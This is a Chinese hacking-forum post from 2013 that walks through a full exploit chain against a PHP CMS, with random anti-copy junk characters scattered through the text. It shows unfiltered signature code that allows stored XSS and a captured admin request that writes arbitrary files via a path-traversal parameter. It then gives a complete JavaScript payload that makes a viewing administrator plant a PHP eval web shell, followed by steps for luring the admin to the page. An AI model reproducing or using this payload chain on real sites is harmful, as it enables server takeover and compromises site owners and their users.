|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题2 {( U1 \6 e2 {. z) s
官网已经修补了,所以重新下了源码
7 I# X6 v" q& ~/ \6 |1 U因为 后台登入 还需要认证码 所以 注入就没看了。- d0 F; T& x9 y5 p! [5 g
存在 xss
4 v9 Q( Y0 K: l7 D漏洞文件 user/member/skin_edit.php
5 ~' s! a2 d( K# A) @" C2 c本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:4 M3 y* N* w- O. V& C
5 V* r2 e. g& O0 g j0 A</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?># V O% p% t$ ]# _9 T2 y6 b" r" H/ x
1 k! M/ C M4 \% y</textarea></td></tr>
: Z" n6 D* Y% }6 @ Y& H4 c# g }
p5 `. i: }/ J user/do.php ! p, |/ i$ d' n
2 o' m+ Q: H) Q6 I7 T4 G
: l! a; D& \9 o9 }2 i, ?8 J; kif($op=='zl'){ //资料- I' A# w! F0 ]
4 S0 K2 N5 K3 r/ c! j* K
if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
5 ?: D! u5 u& ?6 `6 }6 z0 J5 z exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
" e" l; L- _; }4 Y" |' k( ~
) i$ r2 x2 z: ?3 ] $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',
0 V. h8 e( t3 L {, Y3 l( q ; g% M- g2 [6 U( w5 @1 F
CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'- W x8 Z3 ^6 D$ {. J7 [( n1 P
where CS_Name='".$cscms_name."'";( X: l& B5 _. s* n9 z& q: n
# O7 O* T6 L, v4 \+ ~* G; a
if($db->query($sql)){% [& A- [1 W0 s! H D b; p2 f
6 h4 y: T7 M9 J" X4 F" A) D, U. j
exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));8 U r: ?- e; E: f" u) r2 E
6 q6 c9 H' ?) f" H" u
}else{
* Q$ q2 h1 Q+ ^# g- p C" ~ ) \( d& X: w. ^1 U1 A% k& o
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
7 M6 O- d/ t7 d! }3 r' s
2 z' n0 e9 M" Z# u$ s }/ a) O# Q/ c6 u; j* N" X- V
4 n" @; k7 J" \) n1 E
; z8 p! M/ J5 w- p1 Z没有 过滤导致xss产生。
/ s4 g' D0 y* @8 h2 g* C后台 看了下 很奇葩的是可以写任意格式文件。。
8 {) n$ x4 n7 I) H抓包。。8 g& r9 `( R) b1 t) T
9 E, [+ I+ F2 h4 Z; ]% H5 e" s2 Q& ~) d; `: `# C' p
本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
Z' E% H# M) E6 M5 X" v! n/ |
- c: \) Q& z# l4 B7 @Accept: text/html, application/xhtml+xml, */*7 \: a) k3 {: {9 w: U
2 T, D# ~/ m0 L/ i- g4 Q( \
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php- C* g2 G& n# x) i* U: ]
+ t4 c5 Y! m9 G2 R' Y, Y UAccept-Language: zh-CN
e% G0 ?6 E1 Q% C d
! c4 D/ I0 E8 G+ Y& M KUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
& B8 n; B2 z9 ]& Q
* r# w! ] @8 B) tContent-Type: application/x-www-form-urlencoded
9 D) h2 p% ~8 i, v/ e2 Z9 T9 } " O$ w) J# B7 R6 |9 _* B( T
Accept-Encoding: gzip, deflate/ N0 ]1 ?" u8 \: v# z/ e" ?
& S8 U8 g. \& C/ R6 B
Host: 127.0.0.13 M9 N- i2 X" T `
- X& C1 y6 [4 q4 B' r
Content-Length: 38
( Q* h* H9 V" D: [; Y+ R 1 I! U, r6 D) n
DNT: 1
W! O$ l3 W3 C8 w6 b
0 v/ m* F. {# u" a! UConnection: Keep-Alive R7 T, b5 ^0 p8 u# O
: _' C" a3 t5 j7 C
Cache-Control: no-cache2 ]; |* f" W9 Z5 J+ h# ?2 H& N
% ]. K2 d0 }5 z, q8 C
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f655941 U/ ?: E" d4 m7 m
% I1 ^( E: I+ x9 `) i& h5 W# i7 ]
. ~( V8 s$ w4 K7 s3 H) v
name=aaa.php&content=%3Cs%3E%3Ca%25%3E
& m$ a) M1 Q- I
2 M+ Y$ m! i+ p( m5 ^) j
* R# p+ b7 L2 F* c
( w% F; E7 Q' Z% f/ T于是 构造js如下。- t: |' n$ V3 c/ I2 V4 j V
0 Y2 f. o" Z+ Z" k' N: u本帖隐藏的内容<script>
, @! N- ~& g% ]# j4 VthisTHost = top.location.hostname;
) k- `( S$ i8 O% y. n; h
! i. v6 w: `' T$ i8 |thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";9 l: e i% ?. a! _, b
C, Q/ g k$ M* t) F( T ~3 W- @; rfunction PostSubmit(url, data, msg) {
. p5 f {2 q* e var postUrl = url;5 x+ [3 w$ ?- Y, S" r
9 `, N t/ l0 z6 ~: F: T var postData = data; 5 p0 g) f# X! U# _ x% Z
var msgData = msg;
8 g+ j# o! v y0 U! w' b+ J var ExportForm = document.createElement("FORM");
! x6 V; s% l# f ?7 A% w document.body.appendChild(ExportForm);
. |7 t! C% |6 \( _/ z$ K ExportForm.method = "POST"; * \* r9 u6 [9 U% B9 T
var newElement = document.createElement("input"); 6 }$ p* F- ?. @1 q5 k
newElement.setAttribute("name", "name");
2 ?8 }% G* v1 O9 a. L5 ]6 m newElement.setAttribute("type", "hidden"); " O9 U* b- M" `! Q, v" t
var newElement2 = document.createElement("input"); 7 s8 j6 I- G3 A+ m9 q% l& `
newElement2.setAttribute("name", "content");
2 s; C$ D' t a: s newElement2.setAttribute("type", "hidden");
9 U4 ?) q. Y5 i H$ @9 A w3 i ExportForm.appendChild(newElement);
9 F0 a$ b8 T3 u: x4 G ExportForm.appendChild(newElement2);
/ T q9 ~/ j7 u) p6 V5 e$ _( t. f newElement.value = postData;
- M# K, Z# |7 J+ G! V% P, w newElement2.value = msgData;
. E! G% E& F! o/ Q) W4 B ExportForm.action = postUrl; S1 k# k) i9 W/ I
ExportForm.submit();
6 r* I8 `1 q- ?" n. z5 [};5 S+ N9 l1 B% a2 f+ ^: m
* G. U) k8 O% l _* R/ k& V! p
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");( ?0 X% i3 D, C4 T6 W
) l+ p( w! \6 P( S P</script>+ e8 k9 `1 \: L4 S3 h
( C% V e3 t0 v7 b0 ~/ m+ @9 T& T3 c0 f: x. F6 U
! G- @0 p8 n" j/ Ohttp://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入! R3 w2 e, ^1 Z6 w% w
用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)5 ~# C/ [4 r* Y
就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
+ I4 A; S$ b! u. ] |
|
发表于 2013-11-6 18:09:37
收藏
支持
反对